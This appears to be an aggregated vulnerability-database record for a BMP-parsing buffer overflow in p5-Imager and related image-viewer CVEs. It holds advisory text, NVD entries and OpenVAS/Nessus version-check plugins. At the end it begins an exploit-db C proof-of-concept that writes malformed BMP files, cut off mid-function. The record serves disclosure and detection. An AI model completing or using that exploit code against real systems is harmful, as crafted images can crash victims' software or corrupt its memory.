ID 632C98BE-AAD2-4AF2-849F-41A6862AFD6A Type freebsd Reporter FreeBSD Modified 2010-05-12T00:00:00
Description
Imager 0.56 and all earlier versions with BMP support have
a security issue when reading compressed 8-bit per pixel BMP
files where either a compressed run of data or a literal run
of data overflows the scan-line.
Such an overflow causes a buffer overflow in a malloc()
allocated memory buffer, possibly corrupting the memory arena
headers.
The effect depends on your system memory allocator, with glibc
this typically results in an abort, but with other memory
allocators it may be possible to cause local code execution.
{"id": "632C98BE-AAD2-4AF2-849F-41A6862AFD6A", "bulletinFamily": "unix", "title": "p5-Imager -- possibly exploitable buffer overflow", "description": "\nImager 0.56 and all earlier versions with BMP support have\n\t a security issue when reading compressed 8-bit per pixel BMP\n\t files where either a compressed run of data or a literal run\n\t of data overflows the scan-line.\nSuch an overflow causes a buffer overflow in a malloc()\n\t allocated memory buffer, possibly corrupting the memory arena\n\t headers.\nThe effect depends on your system memory allocator, with glibc\n\t this typically results in an abort, but with other memory\n\t allocators it may be possible to cause local code execution.\n", "published": "2007-04-04T00:00:00", "modified": "2010-05-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/632c98be-aad2-4af2-849f-41a6862afd6a.html", "reporter": "FreeBSD", "references": ["https://rt.cpan.org/Public/Bug/Display.html?id=26811", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html"], "cvelist": ["CVE-2007-1948", "CVE-2007-1943", "CVE-2007-1942", "CVE-2007-1946"], "type": "freebsd", "lastseen": "2018-08-31T01:15:41", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "p5-Imager", "packageVersion": "0.57"}], "bulletinFamily": "unix", "cvelist": ["CVE-2007-1948", "CVE-2007-1943", "CVE-2007-1942", "CVE-2007-1946"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nImager 0.56 and all earlier versions with BMP support have\n\t a security issue when reading compressed 8-bit per pixel BMP\n\t files where either a compressed run of data or a literal run\n\t of data overflows the scan-line.\nSuch an overflow causes a buffer overflow in a malloc()\n\t allocated memory buffer, possibly corrupting the memory arena\n\t headers.\nThe effect depends on your system memory allocator, with glibc\n\t this typically results in an abort, but with other memory\n\t allocators it may be possible to cause local code execution.\n", "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "2acc9f4a8859b0f052c40b502a3297c24c2d7b0397a882513eac13e077555152", "hashmap": [{"hash": "16332ebc70150dcdcc0d6f3da43d38f2", "key": "title"}, {"hash": "52a53acf8984ce2a0e97212d34ffa293", "key": "href"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "3960c8d118957ed9ab66686936804b50", "key": "affectedPackage"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "b1b9f08117924b921426f9874c35bd1e", "key": "cvelist"}, {"hash": "8a00ba0e38fa9989bca8d69602eac8a9", "key": "modified"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "83dabacba4317c344f8a478d2ba92af9", "key": "description"}, {"hash": "c312d2ccc0c0260f00612adbeb343196", "key": "published"}, {"hash": "8b7f9257bb0d4d8b74916882296491e0", "key": "references"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/632c98be-aad2-4af2-849f-41a6862afd6a.html", "id": "632C98BE-AAD2-4AF2-849F-41A6862AFD6A", "lastseen": "2018-08-30T19:15:55", "modified": "2010-05-12T00:00:00", "objectVersion": "1.3", "published": "2007-04-04T00:00:00", "references": ["https://rt.cpan.org/Public/Bug/Display.html?id=26811", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html"], "reporter": "FreeBSD", "title": "p5-Imager -- possibly exploitable buffer overflow", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:15:55"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "p5-Imager", "packageVersion": "0.57"}], "bulletinFamily": "unix", "cvelist": ["CVE-2007-1948", "CVE-2007-1943", "CVE-2007-1942", "CVE-2007-1946"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "\nImager 0.56 and all earlier versions with BMP support have\n\t a security issue when reading compressed 8-bit per pixel BMP\n\t files where either a compressed run of data or a literal run\n\t of data overflows the scan-line.\nSuch an overflow causes a buffer overflow in a malloc()\n\t allocated memory buffer, possibly corrupting the memory arena\n\t headers.\nThe effect depends on your system memory allocator, with glibc\n\t this typically results in an abort, but with other memory\n\t allocators it may be possible to cause local code execution.\n", "edition": 1, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "962ccc5c8e8769df82d8dece4674dcdfcecf6924c5cfe3b1a657c7653bb61190", "hashmap": [{"hash": "16332ebc70150dcdcc0d6f3da43d38f2", "key": "title"}, {"hash": "52a53acf8984ce2a0e97212d34ffa293", "key": "href"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3960c8d118957ed9ab66686936804b50", "key": "affectedPackage"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "b1b9f08117924b921426f9874c35bd1e", "key": "cvelist"}, {"hash": "8a00ba0e38fa9989bca8d69602eac8a9", "key": "modified"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "83dabacba4317c344f8a478d2ba92af9", "key": "description"}, {"hash": "c312d2ccc0c0260f00612adbeb343196", "key": "published"}, {"hash": "8b7f9257bb0d4d8b74916882296491e0", "key": "references"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/632c98be-aad2-4af2-849f-41a6862afd6a.html", "id": "632C98BE-AAD2-4AF2-849F-41A6862AFD6A", "lastseen": "2016-09-26T17:25:02", "modified": "2010-05-12T00:00:00", "objectVersion": "1.2", "published": "2007-04-04T00:00:00", "references": ["https://rt.cpan.org/Public/Bug/Display.html?id=26811", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html"], "reporter": "FreeBSD", "title": "p5-Imager -- possibly exploitable buffer overflow", "type": "freebsd", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:25:02"}], "edition": 3, "hashmap": [{"key": "affectedPackage", "hash": "3960c8d118957ed9ab66686936804b50"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "b1b9f08117924b921426f9874c35bd1e"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "83dabacba4317c344f8a478d2ba92af9"}, {"key": "href", "hash": "52a53acf8984ce2a0e97212d34ffa293"}, {"key": "modified", "hash": "8a00ba0e38fa9989bca8d69602eac8a9"}, {"key": "published", "hash": "c312d2ccc0c0260f00612adbeb343196"}, {"key": "references", "hash": "8b7f9257bb0d4d8b74916882296491e0"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "16332ebc70150dcdcc0d6f3da43d38f2"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "962ccc5c8e8769df82d8dece4674dcdfcecf6924c5cfe3b1a657c7653bb61190", "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "p5-Imager", "packageVersion": "0.57"}]}
{"cve": [{"lastseen": "2016-09-03T08:42:36", "references": ["http://securityreason.com/securityalert/2558", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html", "http://www.securityfocus.com/archive/1/archive/1/464726/100/0/threaded", "http://www.securityfocus.com/bid/23312"], "edition": 1, "description": "Integer overflow in FastStone Image Viewer 2.9 allows context-dependent attackers to cause a denial of service and possibly execute arbitrary code via a crafted BMP image, as demonstrated by wh3intof.bmp and wh4intof.bmp.", "reporter": "NVD", "published": "2007-04-10T21:19:00", "type": "cve", "title": "CVE-2007-1942", "enchantments": {"score": {"modified": "2016-09-03T08:42:36", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-1942"], "scanner": [], "modified": "2008-11-13T01:37:11", "cpe": ["cpe:/a:faststone:image_viewer:2.9"], "id": "CVE-2007-1942", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1942", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T08:42:40", "references": ["http://www.securityfocus.com/bid/23321", "http://securityreason.com/securityalert/2558", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html", "http://www.securityfocus.com/archive/1/archive/1/464726/100/0/threaded"], "edition": 1, "description": "Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp.", "reporter": "NVD", "published": "2007-04-10T21:19:00", "type": "cve", "title": "CVE-2007-1946", "enchantments": {"score": {"modified": "2016-09-03T08:42:40", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-1946"], "scanner": [], "modified": "2008-11-13T01:37:13", "cpe": ["cpe:/o:microsoft:windows_xp::sp1"], "id": "CVE-2007-1946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1946", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T08:42:38", "references": ["http://www.acdsee.com/support/knowledgebase/article?id=2800", "http://www.securityfocus.com/bid/23317", "http://securityreason.com/securityalert/2558", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html", "http://www.vupen.com/english/advisories/2007/1283", "http://www.securityfocus.com/archive/1/archive/1/464726/100/0/threaded"], "edition": 1, "description": "Integer overflow in ACDSee Photo Manager 9.0 allows context-dependent attackers to cause a denial of service and possibly execute arbitrary code via large width image sizes in a crafted BMP image, as demonstrated by w3intof.bmp and w4intof.bmp.", "reporter": "NVD", "published": "2007-04-10T21:19:00", "type": "cve", "title": "CVE-2007-1943", "enchantments": {"score": {"modified": "2016-09-03T08:42:38", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-1943"], "scanner": [], "modified": "2011-03-07T21:53:15", "cpe": ["cpe:/a:acd_systems:acdsee_photo_manager:9.0"], "id": "CVE-2007-1943", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1943", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T08:42:41", "references": ["http://www.vupen.com/english/advisories/2007/1284", "http://securityreason.com/securityalert/2558", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html", "http://www.securityfocus.com/archive/1/archive/1/464726/100/0/threaded"], "edition": 1, "description": "Buffer overflow in IrfanView 3.99 allows context-dependent attackers to cause a denial of service and possibly execute arbitrary code via the (1) xoffset or (2) yoffset RLE command, or (3) large non-RLE encoded blocks in a crafted BMP image, as demonstrated by rle8of3.bmp and rle8of4.bmp.", "reporter": "NVD", "published": "2007-04-10T21:19:00", "type": "cve", "title": "CVE-2007-1948", "enchantments": {"score": {"modified": "2016-09-03T08:42:41", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-1948"], "scanner": [], "modified": "2011-03-07T21:53:15", "cpe": ["cpe:/a:irfanview:irfanview:3.99"], "id": "CVE-2007-1948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1948", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:13", "references": [], "pluginID": "58858", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "FreeBSD Ports: p5-Imager", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1948", "CVE-2007-1943", "CVE-2007-1942", "CVE-2007-1946"], "modified": "2016-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58858", "id": "OPENVAS:58858", "sourceData": "#\n#VID 632c98be-aad2-4af2-849f-41a6862afd6a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: p5-Imager\n\n=====\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttps://rt.cpan.org/Public/Bug/Display.html?id=26811\nhttp://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html\nhttp://www.vuxml.org/freebsd/632c98be-aad2-4af2-849f-41a6862afd6a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(58858);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2007-1942\", \"CVE-2007-1943\", \"CVE-2007-1946\", \"CVE-2007-1948\");\n script_name(\"FreeBSD Ports: p5-Imager\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"p5-Imager\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.57\")<0) {\n txt += 'Package p5-Imager version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:33:48", "references": ["https://rt.cpan.org/Public/Bug/Display.html?id=26811", "http://www.nessus.org/u?55dc6bb0", "http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html"], "pluginID": "25130", "description": "Imager 0.56 and all earlier versions with BMP support have a security issue when reading compressed 8-bit per pixel BMP files where either a compressed run of data or a literal run of data overflows the scan-line.\n\nSuch an overflow causes a buffer overflow in a malloc() allocated memory buffer, possibly corrupting the memory arena headers.\n\nThe effect depends on your system memory allocator, with glibc this typically results in an abort, but with other memory allocators it may be possible to cause local code execution.", "edition": 4, "reporter": "Tenable", "published": "2007-05-02T00:00:00", "title": "FreeBSD : p5-Imager -- possibly exploitable buffer overflow (632c98be-aad2-4af2-849f-41a6862afd6a)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1948", "CVE-2007-1943", "CVE-2007-1942", "CVE-2007-1946"], "modified": "2013-06-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:p5-Imager"], "id": "FREEBSD_PKG_632C98BEAAD24AF2849F41A6862AFD6A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25130", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25130);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2013/06/21 23:57:16 $\");\n\n script_cve_id(\"CVE-2007-1942\", \"CVE-2007-1943\", \"CVE-2007-1946\", \"CVE-2007-1948\");\n\n script_name(english:\"FreeBSD : p5-Imager -- possibly exploitable buffer overflow (632c98be-aad2-4af2-849f-41a6862afd6a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Imager 0.56 and all earlier versions with BMP support have a security\nissue when reading compressed 8-bit per pixel BMP files where either a\ncompressed run of data or a literal run of data overflows the\nscan-line.\n\nSuch an overflow causes a buffer overflow in a malloc() allocated\nmemory buffer, possibly corrupting the memory arena headers.\n\nThe effect depends on your system memory allocator, with glibc this\ntypically results in an abort, but with other memory allocators it may\nbe possible to cause local code execution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://rt.cpan.org/Public/Bug/Display.html?id=26811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html\"\n );\n # http://www.freebsd.org/ports/portaudit/632c98be-aad2-4af2-849f-41a6862afd6a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55dc6bb0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:p5-Imager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"p5-Imager<0.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "references": ["https://vulners.com/securityvulns/securityvulns:doc:18344", "https://vulners.com/securityvulns/securityvulns:doc:16595"], "description": "Multiple buffer overflows on BPM, TIFF, XPM, CLP, PSP, RAS, IFF, PNG images parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2007-11-02T00:00:00", "title": "Multiple image viewers multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:25", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "IrfanView", "version": "4.0", "operator": "eq"}, {"name": "XnView", "version": "1.90", "operator": "eq"}, {"name": "ABC-View Manager", "version": "1.42", "operator": "eq"}, {"name": "GIMP", "version": "2.2", "operator": "eq"}, {"name": "IrfanView", "version": "3.99", "operator": "eq"}, {"name": "Photofiltre Studio", "version": "8.1", "operator": "eq"}, {"name": "Paint Shop Pro", "version": "11.20", "operator": "eq"}, {"name": "FastStone Image Viewer", "version": "2.9", "operator": "eq"}], "cvelist": ["CVE-2007-4344", "CVE-2007-1948", "CVE-2007-2365", "CVE-2007-1943", "CVE-2007-2363", "CVE-2007-1942", "CVE-2007-1946", "CVE-2007-2366"], "modified": "2007-11-02T00:00:00", "id": "SECURITYVULNS:VULN:7535", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7535", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24784](https://secuniaresearch.flexerasoftware.com/advisories/24784/)\nOther Advisory URL: http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0090.html\nKeyword: wh4intof.bmp\nKeyword: wh3intof.bmp\n[CVE-2007-1942](https://vulners.com/cve/CVE-2007-1942)\nBugtraq ID: 23312\n", "edition": 1, "reporter": "OSVDB", "published": "2007-04-06T08:04:27", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "FastStone Image Viewer BMP Image Handling Memory Corruption", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-1942"], "modified": "2007-04-06T08:04:27", "href": "https://vulners.com/osvdb/OSVDB:34664", "id": "OSVDB:34664", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:30", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24779](https://secuniaresearch.flexerasoftware.com/advisories/24779/)\nOther Advisory URL: http://ifsec.blogspot.com/2007/04/several-windows-image-viewers.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0090.html\nKeyword: w3intof.bmp\nKeyword: w4intof.bmp\nFrSIRT Advisory: ADV-2007-1283\n[CVE-2007-1943](https://vulners.com/cve/CVE-2007-1943)\nBugtraq ID: 23317\n", "edition": 1, "reporter": "OSVDB", "published": "2007-04-04T07:31:27", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "ACDSee Multiple Product BMP Image Handling Overflow", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-1943"], "modified": "2007-04-04T07:31:27", "href": "https://vulners.com/osvdb/OSVDB:34663", "id": "OSVDB:34663", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T11:11:39", "osvdbidlist": ["34664"], "references": [], "edition": 1, "description": "FastStone Image Viewer 2.9/3.6 BMP Image Handling Memory Corruption. CVE-2007-1942. Dos exploit for windows platform", "reporter": "Ivan Fratric", "published": "2007-04-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "FastStone Image Viewer 2.9/3.6 BMP Image Handling Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1942"], "modified": "2007-04-04T00:00:00", "id": "EDB-ID:29816", "href": "https://www.exploit-db.com/exploits/29816/", "sourceData": "source: http://www.securityfocus.com/bid/23312/info\r\n\r\nFastStone Image Viewer is prone to multiple denial-of-service vulnerabilities because the application fails to properly handle malformed BMP image files.\r\n\r\nSuccessfully exploiting these issues allows attackers to crash the affected application. Given the nature of these issues, attackers may also be able to run arbitrary code, but this has not been confirmed.\r\n\r\nFastStone Image Viewer 2.9 and 3.6 are affected. \r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\r\nstruct BITMAPFILEHEADER {\r\nunsigned int bfSize;\r\nunsigned int bfReserved;\r\nunsigned int bfOffBits;\r\n};\r\n\r\nstruct BITMAPINFOHEADER {\r\nunsigned int biSize;\r\nunsigned int biWidth;\r\nunsigned int biHeight;\r\nunsigned short biPlanes;\r\nunsigned short biBitCount;\r\nunsigned int biCompression;\r\nunsigned int biSizeImage;\r\nunsigned int biXPelsPerMeter;\r\nunsigned int biYPelsPerMeter;\r\nunsigned int biClrUsed;\r\nunsigned int biClrImportant;\r\n};\r\n\r\nvoid writebmp(char *filename, unsigned long width, unsigned long height, unsigned int bpp, unsigned int compression, unsigned char *palette, long numpalettecolors, unsigned char *data, long numdatabytes) {\r\nBITMAPFILEHEADER fileheader;\r\nBITMAPINFOHEADER infoheader;\r\n\r\nmemset(&fileheader,0,sizeof(BITMAPFILEHEADER));\r\nmemset(&infoheader,0,sizeof(BITMAPINFOHEADER));\r\n\r\nunsigned char sig[2];\r\nsig[0] = 'B';\r\nsig[1] = 'M';\r\n\r\nfileheader.bfSize = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4+numdatabytes;\r\nfileheader.bfOffBits = sizeof(sig)+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER)+numpalettecolors*4;\r\n\r\ninfoheader.biSize = 40;\r\ninfoheader.biWidth = width;\r\ninfoheader.biHeight = height;\r\ninfoheader.biPlanes = 1;\r\ninfoheader.biBitCount = bpp;\r\ninfoheader.biCompression = compression;\r\ninfoheader.biClrUsed = numpalettecolors;\r\n\r\nFILE *fp = 